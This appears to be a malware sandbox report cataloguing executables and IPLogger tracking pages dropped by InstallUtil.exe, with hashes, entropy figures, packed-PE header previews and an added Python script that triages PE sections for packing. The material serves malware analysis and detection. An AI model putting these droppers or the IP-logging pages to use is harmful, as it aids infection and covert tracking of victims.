                                                                                                                                                                                                                                SHA-512:FD475E18155421F6AB15F57C0A9FD37C10095C29C89D70AFCB80489EA7813209BAD815B1F51C44652094E4B479ACDA362C1EDD6BBEA3E9A9F498C13B0CF14A93
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S.......-...@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7446
                                                                                                                                                                                                                                Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2172545
                                                                                                                                                                                                                                Entropy (8bit):7.994835824960051
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
                                                                                                                                                                                                                                MD5:9D959BCB3482D418504AF43B76F7A181
                                                                                                                                                                                                                                SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
                                                                                                                                                                                                                                SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
                                                                                                                                                                                                                                SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7446
                                                                                                                                                                                                                                Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2960760
                                                                                                                                                                                                                                Entropy (8bit):7.768471767391905
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:GnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHM:VWqlkLESgCRE/vhOjb05efd6e/oXHM
                                                                                                                                                                                                                                MD5:A0B6C5CF58F02D6142CF1D604FE17960
                                                                                                                                                                                                                                SHA1:6E68B57617674727D99CFC1883FEF825A4C17183
                                                                                                                                                                                                                                SHA-256:D66626CD63607C17D1107176A80FF6C2706F8459056CEB22B46BB1CFEB4906AC
                                                                                                                                                                                                                                SHA-512:1AD33AA4489092807E2AFDFA17F40EAF4A1EFF738987657FAB2C6DF678CD116CBAC61B86F4D1BAFBBEF8170319D43535FB670D6065495297C34D056E92D64A14
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S.....b.-...@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7446
                                                                                                                                                                                                                                Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2960760
                                                                                                                                                                                                                                Entropy (8bit):7.768478707012743
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:NnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHE:kWqlkLESgCRE/vhOjb05efd6e/oXHE
                                                                                                                                                                                                                                MD5:2B8B2102FC536A6830F9F1B6B1FBAF10
                                                                                                                                                                                                                                SHA1:6D0B2894A9522B1F49F2E0621559562DCE49068F
                                                                                                                                                                                                                                SHA-256:7BFC33C312DA336891DB06D105C1287053BD71BC2D5079F1B78FC4E5130FC71D
                                                                                                                                                                                                                                SHA-512:046672DDBAEC7A38FB5361CE327DC32BF39E79A12C29A53086CA37558405C155BB34A3D2E5260A89BB41F0CF0F63A190126AF76B17E673100E0BBB742D5DBB5C
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S.......-...@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
Category:dropped
Size (bytes):2146073
Entropy (8bit):7.982154114080947
Encrypted:false
SSDEEP:49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
MD5:4D3AD654117203E9216F6F44480BB6E0
SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2172545
Entropy (8bit):7.994835824960051
Encrypted:true
SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
MD5:9D959BCB3482D418504AF43B76F7A181
SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:dropped
Size (bytes):7446
Entropy (8bit):5.422209848736349
Encrypted:false
SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:5B423612B36CDE7F2745455C5DD82577
SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:false
Reputation:unknown
Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
Category:dropped
Size (bytes):2146073
Entropy (8bit):7.982154114080947
Encrypted:false
SSDEEP:49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
MD5:4D3AD654117203E9216F6F44480BB6E0
SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):4283784
Entropy (8bit):7.981853182461957
Encrypted:false
SSDEEP:98304:49XSCNlPy0+oWTC7ifvPzHoWNjguEdqMB7o:41SCP6Z3zI4aqMW
MD5:F0A6999F1BC47C6C468CF6DB95003AD5
SHA1:34E2A0E4206D92DA8F328BC87850F6916FDCF1A2
SHA-256:26DB2D4F2338C7301E8B4F1C9C96BBD221DC3C2FF88B1B9B4E253765B8294FDD
SHA-512:26F5978D349704F4A0D32CB5755002721FECF1817393364DD1256F44EC7DFF8EAC6DA68601C209F81837F8A352C846DF0C773E67FA19265843E49B80A691AAA8
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
Category:dropped
Size (bytes):2146073
Entropy (8bit):7.982154114080947
Encrypted:false
SSDEEP:49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
MD5:4D3AD654117203E9216F6F44480BB6E0
SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:dropped
Size (bytes):2960760
Entropy (8bit):7.768474988476935
Encrypted:false
SSDEEP:49152:PnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHv:aWqlkLESgCRE/vhOjb05efd6e/oXHv
MD5:D03390586F3419389E3E1E8BDDA44271
SHA1:0D2CDC736DA108BCC5C91FC7E633F5006BAC28F0
SHA-256:83A8D7ED534110EDF3A05E4FDEC58ED4A3C46FFE8C877CBCF47BAC3231982F07
SHA-512:4CBFE5007B9D24B8399DBBA869A42C275F2C68666C5287E769A50154C31D1420B4F6B6FA5A3854186AD5A080485542633A9FB1AF6AEDE93E027210DAFF8DC0DF
Malicious:true
Reputation:unknown

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2172545
Entropy (8bit):7.994835824960051
Encrypted:true
SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
MD5:9D959BCB3482D418504AF43B76F7A181
SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
Malicious:true
Reputation:unknown
Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:dropped
Size (bytes):2960760
Entropy (8bit):7.7684810593398215
Encrypted:false
SSDEEP:49152:BnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHN:IWqlkLESgCRE/vhOjb05efd6e/oXHN
MD5:62C35A470D7DEB3AA4D433FB19C5E7F0
SHA1:E87FC235E15F027B34893EF41B2BDD6A4E0FD15D
SHA-256:19C92B60CEC2C7B8F506462524ABDDE7243D12A7E37A7D3DCB49BA0EE8F8D7BF
SHA-512:F32826BCF3ED95CDE1FBBD2321AABFAE497E3DE10071C915BDCD80B3F49FDA8553BA0846372D2A1F857F03C0194827B57FFCCADB38F861C8DF499BE8534BE7FA
Malicious:true
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S.....W.-...@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...
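Two of the fields in these records can be recomputed offline. "Entropy (8bit)" is the Shannon entropy of the whole file in bits per byte, and "Encrypted" is a cut-off applied to it: the 2,172,545-byte drop at 7.9948 is Encrypted:true while the 2,146,073-byte Nullsoft installer at 7.9822 is not, so the report's cut-off lies somewhere between those values. The section names visible in the previews (UPX0, UPX1 and the UPX! tag; CODE/DATA/BSS; .ndata for a Nullsoft installer) are the same structural cues behind the "UPX compressed" and "Nullsoft Installer" file-type strings. The Python below is an added example, not Joe Sandbox code: it parses a PE section table, computes whole-file and per-section entropy, lists sections that are both writable and executable (a typical footprint of a runtime unpacker stub, which writes decompressed code into a section and then runs it), and applies a simple packer heuristic. The ENCRYPTED_THRESHOLD of 7.99 is an assumption, and build_demo_pe() produces a constructed synthetic image for offline testing rather than any of the samples above.

```python
# Dropped-file triage: 8-bit entropy, PE section names, W+X sections.
# Added example, not Joe Sandbox code; the threshold below is an assumption.
import math
import struct
from collections import Counter

# Assumed cut-off for the report's 'Encrypted' flag. The report's rule is not
# shown; its values (7.9948 -> true, 7.9822 -> false) are consistent with 7.99.
ENCRYPTED_THRESHOLD = 7.99
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0..8.0), the 'Entropy (8bit)' scale."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def pe_sections(image: bytes):
    """Return [(name, raw_bytes, characteristics)]; ValueError on a bogus header."""
    if len(image) < 0x40 or image[:2] != b"MZ":
        raise ValueError("no MZ header")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\x00\x00" or e_lfanew + 24 > len(image):
        raise ValueError("no PE signature at e_lfanew")
    (num_sections,) = struct.unpack_from("<H", image, e_lfanew + 6)   # COFF NumberOfSections
    (opt_size,) = struct.unpack_from("<H", image, e_lfanew + 20)      # SizeOfOptionalHeader
    table = e_lfanew + 24 + opt_size                                   # first IMAGE_SECTION_HEADER
    if table + 40 * num_sections > len(image):
        raise ValueError("section table runs past end of file")
    sections = []
    for i in range(num_sections):
        hdr = struct.unpack_from("<8sIIIIIIHHI", image, table + 40 * i)
        name = hdr[0].rstrip(b"\x00").decode("latin-1")
        raw_size, raw_ptr, chars = hdr[3], hdr[4], hdr[9]
        sections.append((name, image[raw_ptr:raw_ptr + raw_size], chars))
    return sections


def triage(image: bytes, threshold: float = ENCRYPTED_THRESHOLD) -> dict:
    """Recompute the report's entropy/encrypted fields and add packer hints."""
    secs = pe_sections(image)
    names = [n for n, _, _ in secs]
    packer = None
    if any(n.startswith("UPX") for n in names):
        packer = "UPX"    # UPX0/UPX1 section names, as in the previews above
    elif ".ndata" in names:
        packer = "NSIS"   # Nullsoft installer data section
    h = shannon_entropy(image)
    return {
        "entropy": h,
        "encrypted": h > threshold,
        "sections": {n: round(shannon_entropy(d), 3) for n, d, _ in secs},
        # Writable+executable sections: where an unpacker stub writes, then runs, code
        "wx_sections": [n for n, _, c in secs
                        if c & IMAGE_SCN_MEM_EXECUTE and c & IMAGE_SCN_MEM_WRITE],
        "packer": packer,
    }


def build_demo_pe(sections) -> bytes:
    """Constructed minimal PE32 image for offline testing; not a real sample.
    sections: iterable of (name: bytes, data: bytes, characteristics: int)."""
    e_lfanew, opt_size, align = 0x80, 0xE0, 0x200
    sections = list(sections)
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)          # PE32 magic
    headers_end = e_lfanew + 24 + opt_size + 40 * len(sections)
    raw_ptr = -(-headers_end // align) * align     # file offset of first section
    table, raw, va = b"", b"", 0x1000
    for name, data, chars in sections:
        size = -(-len(data) // align) * align
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\x00"), len(data), va,
                             size, raw_ptr + len(raw), 0, 0, 0, 0, chars)
        raw += data.ljust(size, b"\x00")
        va += max(size, 0x1000)
    image = bytes(dos) + b"PE\x00\x00" + coff + bytes(opt) + table
    return image.ljust(raw_ptr, b"\x00") + raw


if __name__ == "__main__":
    # Constructed stand-in for a UPX-packed dropper: an empty RWX UPX0 plus a
    # UPX1 whose bytes are uniformly distributed (entropy 8.0).
    rwx = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE
    demo = build_demo_pe([
        (b"UPX0", b"", rwx),
        (b"UPX1", bytes(range(256)) * 4, rwx),
        (b".rsrc", b"\x00" * 512, 0x40000040),
    ])
    print(triage(demo))
```

On a real drop, call triage() on the file bytes; the whole-file entropy will match the report's "Entropy (8bit)" field, while the per-section figures show where the high-entropy payload actually sits (in a UPX-packed file it is UPX1, with UPX0 empty on disk but mapped RWX for the unpacked code). Note that high entropy alone does not separate compression from encryption, which is why the report pairs it with the "UPX compressed" file-type string.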

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:dropped
Size (bytes):7446
Entropy (8bit):5.422209848736349
Encrypted:false
SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:5B423612B36CDE7F2745455C5DD82577
SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:false
Reputation:unknown
Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
Category:dropped
Size (bytes):2146073
Entropy (8bit):7.982154114080947
Encrypted:false
